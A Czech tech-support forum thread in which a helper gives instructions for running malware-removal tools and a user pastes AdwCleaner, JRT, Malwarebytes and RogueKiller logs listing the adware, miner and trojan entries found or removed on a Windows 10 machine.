http://www.majorgeeks.com/mg/getmirror/ ... ool,1.html
http://www.majorgeeks.com/mg/getmirror/ ... ool,2.html
Viry mohou zpomalit počítač, nebo se snaží ukrást vaše data, a ani nevíte , že je máte. Co potřebujete, je rychlý a snadný způsob, jak je najít a zbavit se jich, pokud již máte antivirový program v počítači nainstalován , můžete nainstalovat i nástroj Sophos Virus Removal , který identifikuje a vyčistí zbylé infekce, které mohl Váš antivirový program přehlédnout.
K použití Sophos Virus Removal Tool na něj poklepejte a stiskněte tlačítko „Start scanning“ . Pak bude Sophos Virus Removal Tool vyhledávat a odstraňovat viry, které najde. Může být vyžadován restart.
Stáhni si RogueKiller by Adlice Software
32bit.:
http://www.adlice.com/download/roguekil ... HlwZT14ODY
64bit.:
http://www.adlice.com/download/roguekil ... HlwZT14NjQ
na svojí plochu.
- Zavři všechny ostatní programy a prohlížeče.
- Pro OS Vista a win7,8,10 spusť program RogueKiller.exe jako správce , u XP poklepáním.
- klikni na „Start Scan“. V novém okně nic neměň a klikni dole na „Start Scan“
- Program skenuje procesy PC. Po proskenování klikni na „Open Report “ , v okně pak na „Open TXT“ a celý obsah logu sem zkopíruj.
Pokud je program blokován , zkus ho spustit několikrát. Pokud dále program nepůjde spustit a pracovat, přejmenuj ho na winlogon.exe.
-pokud bude mít log více než 60.000 znaků , rozděl ho a vlož do více příspěvků
Při práci s programy HJT, ComboFix,MbAM, SDFix aj. zavřete všechny ostatní aplikace a prohlížeče!
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Neposílejte logy do soukromých zpráv.Po dobu mé nepřítomnosti mě zastupuje memphisto , Žbeky a Orcus.
Pokud budete spokojeni , můžete podpořit naše forum:Podpora fóra
Re: Prosím o kontrolu logu
# AdwCleaner v6.044 - Log vytvořen 15/03/2017 v 17:51:07
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Místní]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Čištění
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
[-] Služba smazána: Plusdax
***** [ Složky ] *****
[-] Složka smazána: C:\Users\Nekut\AppData\Local\globalUpdate
[-] Složka smazána: C:\Users\Nekut\AppData\Roaming\cpuminer
[-] Složka smazána: C:\Users\Nekut\AppData\Roaming\ppslog
[-] Složka smazána: C:\Program Files\NixSrv
[-] Složka smazána: C:\ProgramData\AVG Security Toolbar
[-] Složka smazána: C:\ProgramData\Uniblue
[-] Složka smazána: C:\ProgramData\Plusdaxs
[-] Složka smazána: C:\ProgramData\Plusdax
[-] Složka smazána: C:\Program Files (x86)\globalUpdate
[-] Složka smazána: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
[-] Soubor smazán: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
[-] Soubor smazán: C:\Users\Nekut\AppData\Roaming\Installer.dat
[-] Soubor smazán: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Zástupci ] *****
***** [ Naplánované úlohy ] *****
***** [ Registry ] *****
[-] Klíč smazán: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
[-] Klíč smazán: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
[-] Klíč smazán: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\Installer\Products\0C776EBEBCBCFBE408892EE7B12517FC
[-] Klíč smazán: HKLM\SOFTWARE\Classes\driverscanner
[-] Klíč smazán: HKLM\SOFTWARE\Classes\ppsmb
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\driverscanner
[#] Klíč smazán po restartu: [x64] HKLM\SOFTWARE\Classes\ppsmb
[-] Klíč smazán: HKLM\SOFTWARE\Classes\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{ED0B64D4-BF27-4521-AD27-190F49BF5EA7}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{023E9EC8-B147-40EB-B0B3-DF90618FB371}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{0522D9A4-4D57-437D-978D-E5B3B6C9005D}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{9B9A45F4-18FC-484A-BACA-076D78273D8E}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A6D54287-7939-466A-8579-92546D946C8C}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{A78EDAFB-926F-4D93-AB13-8232D7378EB1}
[-] Klíč smazán: HKLM\SOFTWARE\Classes\Interface\{47A1DF02-BCE4-40C3-AE47-E3EA09A65E4A}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
[-] Klíč smazán: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5645E0E7-FC12-43BF-A6E4-F9751942B298}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{C7BF8F4B-7BC7-4F42-B944-3D28A3A86D8A}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5E6A8DA1-5731-465B-B036-B9E16EF26CAC}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{B2BC04DF-EFBD-409A-95CA-36874E5AB92A}
[-] Klíč smazán: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{5EC7C511-CD0F-42E6-830C-1BD9882F3458}
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\GlobalUpdate
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\PPStream
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\INSTALLPATH\STATUS
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\mtPlusdax
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Installer
[#] Klíč smazán po restartu: HKCU\Software\GlobalUpdate
[#] Klíč smazán po restartu: HKCU\Software\PPStream
[#] Klíč smazán po restartu: HKCU\Software\INSTALLPATH\STATUS
[#] Klíč smazán po restartu: HKCU\Software\mtPlusdax
[-] Klíč smazán: HKLM\SOFTWARE\GlobalUpdate
[-] Klíč smazán: HKLM\SOFTWARE\SimpleFiles
[-] Klíč smazán: HKLM\SOFTWARE\SupDp
[-] Klíč smazán: HKLM\SOFTWARE\Uniblue
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Uniblue\DriverScanner
[#] Klíč smazán po restartu: HKLM\SOFTWARE\SUPDP
[-] Klíč smazán: HKLM\SOFTWARE\mtPlusdax
[-] Klíč smazán: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SU
[#] Klíč smazán po restartu: [x64] HKCU\Software\GlobalUpdate
[#] Klíč smazán po restartu: [x64] HKCU\Software\PPStream
[#] Klíč smazán po restartu: [x64] HKCU\Software\INSTALLPATH\STATUS
[#] Klíč smazán po restartu: [x64] HKCU\Software\mtPlusdax
[-] Klíč smazán: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: HKU\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Klíč smazán po restartu: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[#] Klíč smazán po restartu: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{95B7759C-8C7F-4BF1-B163-73684A933233}
[-] Data obnovena: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[-] Klíč smazán: HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.info
[-] Klíč smazán: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\mysearch.avg.com
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\inst.shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\inst.shoppingate.info
[#] Klíč smazán po restartu: [x64] HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\shoppingate.info
[-] Hodnota smazána: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run [gpuminer]
[-] Hodnota smazána: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 [vProt]
[-] Klíč smazán: HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
[#] Klíč smazán po restartu: [x64] HKCU\Software\Google\Chrome\Extensions\fcfenmboojpjinhpgggodefccipikbpd
***** [ Prohlížeče ] *****
[-] [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default] [favicon_url] Smazáno: hxxp://www.mystartsearch.com/webfavicon.ico
[-] [C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default] [extension] Smazáno: fcfenmboojpjinhpgggodefccipikbpd
*************************
:: "Tracing" klíče smazány
:: Winsock nastavení vyčištěno
*************************
C:\AdwCleaner\AdwCleaner[C0].txt - [11335 Bajty] - [15/03/2017 17:51:07]
C:\AdwCleaner\AdwCleaner[S0].txt - [10932 Bajty] - [15/03/2017 17:24:58]
C:\AdwCleaner\AdwCleaner[S1].txt - [11008 Bajty] - [15/03/2017 17:50:27]
########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [11557 Bajty] ##########
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.2 (03.10.2017)
Operating System: Windows 10 Home x64
Ran by Nekut (Administrator) on 15.03.2017 at 17:58:58,67
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
File System: 0
Registry: 1
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchUrl\\Default (Registry Value)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on 15.03.2017 at 18:00:38,60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Malwarebytes
www.malwarebytes.com
-Podrobnosti logovacího souboru-
Datum skenování: 15.03.17
Čas skenování: 18:04
Logovací soubor: prt.txt
Správce: Ano
-Informace o softwaru-
Verze: 3.0.6.1469
Verze komponentů: 1.0.75
Aktualizovat verzi balíku komponent: 1.0.1509
Licence: Zkušební
-Systémová informace-
OS: Windows 10
CPU: x64
Systém souborů: NTFS
Uživatel: DESKTOP-S3S217H\Nekut
-Shrnutí skenování-
Typ skenování: Skenování hrozeb (Threat Scan)
Výsledek: Dokončeno
Skenované objekty: 424435
Uplynulý čas: 5 min, 0 sek
-Možnosti skenování-
Paměť: Povoleno
Start: Povoleno
Systém souborů: Povoleno
Archivy: Povoleno
Rootkity: Zakázáno
Heuristika: Povoleno
Potenciálně nežádoucí program: Povoleno
Potenciálně nežádoucí modifikace: Povoleno
-Podrobnosti skenování-
Proces: 0
(Nebyly zjištěny žádné škodlivé položky)
Modul: 0
(Nebyly zjištěny žádné škodlivé položky)
Klíč registru: 0
(Nebyly zjištěny žádné škodlivé položky)
Hodnota v registru: 1
Trojan.Boaxxe.Gen, HKU\S-1-5-21-2417313614-488722605-2671369154-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|EJCZTION, Smazání při restartu, [18446], [262116],1.0.1509
Data registrů: 0
(Nebyly zjištěny žádné škodlivé položky)
Datové proudy: 0
(Nebyly zjištěny žádné škodlivé položky)
Adresář: 0
(Nebyly zjištěny žádné škodlivé položky)
Soubor: 1
PUP.Optional.Linkury.Generic, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\ROAMING\AGENT.DAT, Smazání při restartu, [2399], [360491],1.0.1509
Fyzický sektor: 0
(Nebyly zjištěny žádné škodlivé položky)
(end)
RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : https://forum.adlice.com
Webová stránka : http://www.adlice.com/download/roguekiller/
Blog : http://www.adlice.com
Operační systém : Windows 10 (10.0.14393) 64 bits version
Spuštěno : Normální režim
Uživatel : Nekut [Práva správce]
Started from : C:\Users\Nekut\Downloads\RogueKillerX64.exe
Mód : Prohledat -- Datum : 03/15/2017 18:32:54 (Duration : 00:21:11)
¤¤¤ Procesy : 0 ¤¤¤
¤¤¤ Registry : 11 ¤¤¤
[PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{5EC7C511-CD0F-42E6-830C-1BD9882F3458} -> Nalezeno
[PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{95B7759C-8C7F-4BF1-B163-73684A933233} -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Nalezeno
[Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Nalezeno
[Suspicious.Path|VT.VirTool:Win32/VBInject.AGS!bit] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | D3B96F : %APPDATA%\D3B96F\FC440D.exe [-] -> Nalezeno
[Suspicious.Path|VT.Ransom:Win32/Enestedel.B!rsm] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Opwics : C:\Users\Nekut\AppData\Local\Opwics\nhspg.exe [-] -> Nalezeno
[Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-2417313614-488722605-2671369154-1001\Software\Microsoft\Windows\CurrentVersion\Run | Ibkjsoft : C:\Windows\SysWOW64\regsvr32.exe C:\Users\Nekut\AppData\Local\Opwics\bzcjicbl.dll [x] -> Nalezeno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | TCP Query User{2745AA29-3952-43AA-B153-6B58BDAF514D}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Nalezeno
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | UDP Query User{25CFBDAA-1221-403A-AB6F-ED4028F32280}C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe : v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|Profile=Public|App=C:\users\nekut\appdata\local\temp\i1488367281\windows\resource\jre\bin\javaw.exe|Name=javaw|Desc=javaw|Defer=User| [x] -> Nalezeno
¤¤¤ Úlohy : 5 ¤¤¤
[Suspicious.Path] %WINDIR%\Tasks\GFQtQALtXtjqpHeY4.job -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Nalezeno
[Suspicious.Path] %WINDIR%\Tasks\wHAbZSf.job -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Nalezeno
[Suspicious.Path] \GFQtQALtXtjqpHeY4 -- C:\Users\Nekut\AppData\Roaming\GFQtQALtXtjqpHeY4.exe (--c=lQWCY15RgpZFB00ObxABi8I+ygOtw0YpTmoV3HxbWT6g6DMSUGGmW+15yIlrgZ0MiD4LaTXzLECweSX0ppaZOl0UQJA2bZ1vygPm/QVuwup4BfwFlujHinC77yxgFfK5PxeXtRUF4iFrLOW4mnlnzLujp5TmyLOABDT1bHu+KtdJIBZihMc1YAmscQsGPb/0Ak5JGl/yIE5FB5OCggbpevMUqwpKqapkS9rgYFfMj8zx4f0uznYjpeTjxgf4Z5fwMVyj6Chi4+9xn50yhTL7W4zZGVXlioEW66xJVNDafc6+96ifrXLrMFKdbzIyE92E4K96WxJzYJyOxxu7cHsHkQ==) -> Nalezeno
[Suspicious.Path] \ProgramDataUpdater -- "C:\windows\pdusvr.exe" -> Nalezeno
[Suspicious.Path] \wHAbZSf -- C:\Users\Nekut\AppData\Roaming\wHAbZSf.exe (--c=NzeC9by4AKE9581pSnydjTpC4yQsXZg5dQgthwNgbL2NoA3oeqXDPEY7C4BlZWMaS9SBOzrqU65Us4sDo5zVnIYbkp72HxOyFSi6bo3INAXB4ohT7BpUFMgA4J9T3mEwjOdBa/XwkzIJ7aew9QpnSL91/3Pa4Ff56tDq2GwWbpvAgg37EE2DinYU0ptTP0CTgnstBA100tGRUqfTwSegJSnME+hoYRyB72uUDsSACCK3uC5CJPlw4tl70n9ztYigT2Emhcr1nZXDsixtpSnvQvJqtgDEKfhlB7DPHeT9B3bwGTtrbs7cE5Dd/qR/kbJLAOcym06GwpJmFx4SCqYEsg==) -> Nalezeno
¤¤¤ Soubory : 5 ¤¤¤
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.102.217.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.103.32.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.91.22.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\0.99.9.0\Microsoft.Win32.TaskScheduler.dll -> Nalezeno
[Adw.Cloudguard][Soubor] C:\Program Files (x86)\Overwolf\OverwolfUpdater.exe -> Nalezeno
¤¤¤ WMI : 0 ¤¤¤
¤¤¤ Soubor HOSTS : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Nahrán) ¤¤¤
¤¤¤ Webové prohlížeče : 1 ¤¤¤
[PUM.HomePage][Chrome:Config] Default [SecurePrefs] : homepage [https://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWqICWRlg5p-TqszN326G3dy3mHYlJU_leL3IAiGvFzeaOhUIyCJcFE286UNTO4eZPO86PKEGCfrynUmXb3uq_pSnNua3I7BZYgy6kJMdsqTokNPy2WiG_-BWzOIW7ddYj86VlhSK030NLtwh40HfLYPFfyklC09xHt43i2BpT] -> Nalezeno
¤¤¤ Kontrola MBR : ¤¤¤
+++++ PhysicalDrive0: ST1000DM003-1ER162 +++++
--- User ---
[MBR] 0086f36f0b7bc8b257f89fc226376c3d
[BSP] 9e3b3c473b1db0daa516427cdae6e1cc : Windows Vista/7/8 MBR Code
Partition table:
0 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 2048 | Size: 450 MB
1 - [MAN-MOUNT] EFI system partition | Offset (sectors): 923648 | Size: 99 MB
2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 1126400 | Size: 16 MB
3 - Basic data partition | Offset (sectors): 1159168 | Size: 199434 MB
4 - Basic data partition | Offset (sectors): 409600000 | Size: 753869 MB
User = LL1 ... OK
User = LL2 ... OK
# Aktualizováno dne 28/02/2017 z Malwarebytes
# Databáze : 2017-03-15.2 [Místní]
# Operační systém : Windows 10 Home (X64)
# Uživatelské jméno : Nekut - DESKTOP-S3S217H
# Spuštěno z : C:\Users\Nekut\Desktop\AdwCleaner.exe
# Mod: Čištění
# Podpora : https://www.malwarebytes.com/support
***** [ Služby ] *****
[-] Služba smazána: Plusdax
***** [ Složky ] *****
[-] Složka smazána: C:\Users\Nekut\AppData\Local\globalUpdate
[-] Složka smazána: C:\Users\Nekut\AppData\Roaming\cpuminer
[-] Složka smazána: C:\Users\Nekut\AppData\Roaming\ppslog
[-] Složka smazána: C:\Program Files\NixSrv
[-] Složka smazána: C:\ProgramData\AVG Security Toolbar
[-] Složka smazána: C:\ProgramData\Uniblue
[-] Složka smazána: C:\ProgramData\Plusdaxs
[-] Složka smazána: C:\ProgramData\Plusdax
[-] Složka smazána: C:\Program Files (x86)\globalUpdate
[-] Složka smazána: C:\Users\Nekut\AppData\Local\Google\Chrome\User Data\Default\databases\chrome-extension_akaelkiagnbfcccfnmbimdbplecgbikh_0
***** [ Soubory ] *****
[-] Soubor smazán: C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
[-] Soubor smazán: C:\Users\Nekut\AppData\Roaming\Installer.dat
[-] Soubor smazán: C:\Users\Nekut\AppData\Roaming\Main.dat
***** [ DLL ] *****
***** [ WMI ] *****
***** [ Zástupci ] *****
***** [ Naplánované úlohy ] *****
***** [ Registry ] *****
[-] Klíč smazán: HKLM\SOFTWARE\6734ebd2-f889-45db-86ff-4cf01bad675d
[-] Klíč smazán: HKLM\SOFTWARE\7fb7766b-64b0-4740-b3e0-8facee1c2b95
[-] Klíč smazán: HKLM\SOFTWARE\d5c55897-9fd9-4ce5-9991-7aca12b6be56
[#] Klíč smazán po restartu: HKLM\SOFTWARE\Classes\Installer\Features\0C776EBEBCBCFBE408892EE7B12517FC
